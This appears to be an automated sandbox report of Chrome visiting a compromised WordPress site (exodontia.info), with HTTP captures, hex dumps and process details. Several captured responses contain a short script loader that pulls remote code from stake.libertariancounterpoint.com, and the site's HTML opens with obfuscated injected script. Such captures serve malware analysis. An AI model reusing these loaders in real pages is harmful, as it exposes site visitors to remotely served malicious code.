                                                                                                                                      2024-04-24 10:14:26 UTC16384INData Raw: 75 62 74 6c 65 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 74 62 6f 64 79 20 74 72 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 63 66 30 65 66 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 2e 69 73 2d 73 74 79 6c 65 2d 73 74 72 69 70 65 73 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 2e 69 73 2d 73 74 79 6c 65 2d 73 74 72 69 70 65 73 20 74 68 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 2e 68 61 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 2e 68 61 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 74 68 2c 2e 77 70 2d 62 6c 6f 63
                                                                                                                                      Data Ascii: ubtle-pale-pink-background-color tbody tr:nth-child(odd){background-color:#fcf0ef}.wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{border-color:#0000}.wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-bloc


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      143192.168.2.164992331.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:25 UTC556OUTGET /WyNzslZcNXc4hHNvLCDDiTamINVoxtt-L-d6Ayg3PMl HTTP/1.1
                                                                                                                                      Host: funcallback.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:25 UTC767INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:25 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 247
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:14:25 GMT
                                                                                                                                      Set-Cookie: _subid=2vk1oobld9en2; expires=Sat, 25 May 2024 10:14:25 GMT; path=/
                                                                                                                                      Set-Cookie: 7e4fc=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQ2OTZcIjoxNzEzOTUzNjY1LFwiNDY4NlwiOjE3MTM5NTM2NjUsXCI0Njc4XCI6MTcxMzk1MzY2NX0sXCJjYW1wYWlnbnNcIjp7XCIyMTZcIjoxNzEzOTUzNjY1LFwiMjI5XCI6MTcxMzk1MzY2NSxcIjIyOFwiOjE3MTM5NTM2NjV9LFwidGltZVwiOjE3MTM5NTM2NjV9In0.uY0h5SfmB7XiqloyzA7WfSpHNt3iXwOEC8hOsHH5i8w; expires=Fri, 19 Aug 2078 20:28:50 GMT; path=/
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      2024-04-24 10:14:25 UTC247INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 71 2c 66 2c 65 2c 77 2c 6a 29 7b 77 3d 71 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 29 3b 6a 3d 71 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 66 29 5b 30 5d 3b 77 2e 61 73 79 6e 63 3d 31 3b 77 2e 73 72 63 3d 65 3b 6a 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 77 2c 6a 29 3b 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 73 74 61 6b 65 2e 6c 69 62 65 72 74 61 72 69 61 6e 63 6f 75 6e 74 65 72 70 6f 69 6e 74 2e 63 6f 6d 2f 2b 36 4e 36 37 59 43 42 47 59 53 66 67 55 44 66 7a 5a 42 57 7a 34 6d 42 51 4d 2b 58 30 52 79 47 69 38 30 4e 6a 4a 2f 46 46 34 65 4a 77 56 69 51 27 29 3b
                                                                                                                                      Data Ascii: ;(function(o,q,f,e,w,j){w=q.createElement(f);j=q.getElementsByTagName(f)[0];w.async=1;w.src=e;j.parentNode.insertBefore(w,j);})(window,document,'script','https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ');


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      144192.168.2.1649927153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:26 UTC862OUTGET /wp-content/uploads/2021/07/Exodontia-Homepage-01-copy.png HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://exodontia.info/adverts-sponsors-policy/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_XW48SKHQ61=GS1.1.1713953647.1.1.1713953663.0.0.0; _ga_BW7F70S0MZ=GS1.1.1713953648.1.1.1713953663.0.0.0
                                                                                                                                      2024-04-24 10:14:27 UTC651INHTTP/1.1 404 Not Found
                                                                                                                                      Connection: close
                                                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                      link: <https://exodontia.info/wp-json/>; rel="https://api.w.org/"
                                                                                                                                      server-timing: wp-before-template;dur=42.18
                                                                                                                                      transfer-encoding: chunked
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:26 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:27 UTC717INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 32 65 31 28 29 7b 76 61 72 20 5f 30 78 37 36 33 37 63 34 3d 5b 27 65 64 67 65 27 2c 27 69 6e 73 65 72 74 41 64 6a 61 63 65 6e 74 48 54 4d 4c 27 2c 27 64 69 73 61 62 6c 65 64 27 2c 27 67 6c 6f 62 61 6c 5f 6e 61 6d 65 27 2c 27 73 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 31 39 35 36 37 36 34 37 75 6f 54 65 4b 69 27 2c 27 6e 61 76 69 67 61 74 6f 72 49 6e 66 6f 27 2c 27 68 6f 73 74 27 2c 27 5b 64 61 74 61 2d 69 64 3d 5c 78 32 37 27 2c 27 62 72 6f 77 73 65 72 27 2c 27 3c 73 74 79 6c 65 5c 78 32 30 64 61 74 61 2d 69 64 3d 5c 78 32
                                                                                                                                      Data Ascii: 10000<!DOCTYPE html><html lang="en-GB"> <head><script>function _0x42e1(){var _0x7637c4=['edge','insertAdjacentHTML','disabled','global_name','setAttribute','19567647uoTeKi','navigatorInfo','host','[data-id=\x27','browser','<style\x20data-id=\x2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      145192.168.2.1649928185.158.251.2404437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:27 UTC579OUTGET /+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ HTTP/1.1
                                                                                                                                      Host: stake.libertariancounterpoint.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:32 UTC165INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:32 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:14:32 UTC209INData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                      2024-04-24 10:14:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      146192.168.2.164992931.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:27 UTC518OUTGET /SDQxw16j HTTP/1.1
                                                                                                                                      Host: gspiceyl.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:28 UTC767INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:28 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 247
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:14:28 GMT
                                                                                                                                      Set-Cookie: _subid=2vk1oobld9eq0; expires=Sat, 25 May 2024 10:14:28 GMT; path=/
                                                                                                                                      Set-Cookie: 7e4fc=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQ2OThcIjoxNzEzOTUzNjY4LFwiNDY4NlwiOjE3MTM5NTM2NjgsXCI0Njc4XCI6MTcxMzk1MzY2OH0sXCJjYW1wYWlnbnNcIjp7XCIyMDdcIjoxNzEzOTUzNjY4LFwiMjI5XCI6MTcxMzk1MzY2OCxcIjIyOFwiOjE3MTM5NTM2Njh9LFwidGltZVwiOjE3MTM5NTM2Njh9In0.uvMWm3Bu5zyLv4hKFqU2IcqaKFTeA77o3GyV0TND8CI; expires=Fri, 19 Aug 2078 20:28:56 GMT; path=/
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      2024-04-24 10:14:28 UTC247INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 71 2c 66 2c 65 2c 77 2c 6a 29 7b 77 3d 71 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 29 3b 6a 3d 71 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 66 29 5b 30 5d 3b 77 2e 61 73 79 6e 63 3d 31 3b 77 2e 73 72 63 3d 65 3b 6a 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 77 2c 6a 29 3b 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 73 74 61 6b 65 2e 6c 69 62 65 72 74 61 72 69 61 6e 63 6f 75 6e 74 65 72 70 6f 69 6e 74 2e 63 6f 6d 2f 2b 36 4e 36 37 59 43 42 47 59 53 66 67 55 44 66 7a 5a 42 57 7a 34 6d 42 51 4d 2b 58 30 52 79 47 69 38 30 4e 6a 4a 2f 46 46 34 65 4a 77 56 69 51 27 29 3b
                                                                                                                                      Data Ascii: ;(function(o,q,f,e,w,j){w=q.createElement(f);j=q.getElementsByTagName(f)[0];w.async=1;w.src=e;j.parentNode.insertBefore(w,j);})(window,document,'script','https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ');


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      147192.168.2.164993031.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:27 UTC523OUTGET /9hFXWz7m HTTP/1.1
                                                                                                                                      Host: debasesingle.life
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:28 UTC767INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:28 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 247
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:14:28 GMT
                                                                                                                                      Set-Cookie: _subid=2vk1oobld9eq2; expires=Sat, 25 May 2024 10:14:28 GMT; path=/
                                                                                                                                      Set-Cookie: 7e4fc=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQ3MTdcIjoxNzEzOTUzNjY4LFwiNDY4NlwiOjE3MTM5NTM2NjgsXCI0Njc4XCI6MTcxMzk1MzY2OH0sXCJjYW1wYWlnbnNcIjp7XCIxNDVcIjoxNzEzOTUzNjY4LFwiMjI5XCI6MTcxMzk1MzY2OCxcIjIyOFwiOjE3MTM5NTM2Njh9LFwidGltZVwiOjE3MTM5NTM2Njh9In0.JX6LmzmZxxdTnCZc7tQ5dP_4B0q7JeAgOx753AXv7Ks; expires=Fri, 19 Aug 2078 20:28:56 GMT; path=/
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      2024-04-24 10:14:28 UTC247INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 71 2c 66 2c 65 2c 77 2c 6a 29 7b 77 3d 71 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 29 3b 6a 3d 71 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 66 29 5b 30 5d 3b 77 2e 61 73 79 6e 63 3d 31 3b 77 2e 73 72 63 3d 65 3b 6a 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 77 2c 6a 29 3b 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 73 74 61 6b 65 2e 6c 69 62 65 72 74 61 72 69 61 6e 63 6f 75 6e 74 65 72 70 6f 69 6e 74 2e 63 6f 6d 2f 2b 36 4e 36 37 59 43 42 47 59 53 66 67 55 44 66 7a 5a 42 57 7a 34 6d 42 51 4d 2b 58 30 52 79 47 69 38 30 4e 6a 4a 2f 46 46 34 65 4a 77 56 69 51 27 29 3b
                                                                                                                                      Data Ascii: ;(function(o,q,f,e,w,j){w=q.createElement(f);j=q.getElementsByTagName(f)[0];w.async=1;w.src=e;j.parentNode.insertBefore(w,j);})(window,document,'script','https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ');


                                                                                                                                      Click to jump to process

                                                                                                                                      Click to jump to process

                                                                                                                                      Click to jump to process

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:12:12:24
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://funcallback.com/
                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:12:12:25
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1856,i,12264961050259194225,6932832445038562369,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      No disassembly